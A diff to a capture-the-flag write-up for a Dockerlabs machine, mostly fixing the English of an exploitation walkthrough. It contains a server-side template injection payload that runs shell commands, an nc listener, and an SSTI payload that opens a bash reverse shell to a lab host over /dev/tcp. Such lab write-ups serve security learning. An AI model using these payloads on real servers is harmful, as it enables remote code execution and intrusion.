Mush2h/Writeups-CTF/Dockerlabs/Easy/Pinguinazo.md

 We can try to access with `SSTI (Server Side Template Injection)`

-We can run some comand to excute a SSTI like this:
+We can run a command to execute an SSTI like this:

 ```ruby
 {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
 ```

 we obtain:

 ![alt text](Imagenes/Pingu_5.png)

-succefully, we obtain response of the server who is our user.
+Successfully, we obtain a response from the server showing our user.

 Now we are going to prepare the reverse shell to connect with us.

-Firstly we need to use nc tool:
+First, we need to use the nc tool:

 ```ruby
 nc -lvnp 1234
 ```

-we can exploit with following comands:
+We can exploit with the following command:

 ```ruby
 {{request.application.__globals__.__builtins__.__import__('os').popen('bash -c "bash -i >& /dev/tcp/192.168.139.130/1234 0>&1"').read()}}
 ```

 ![alt text](Imagenes/Pingu_6.png)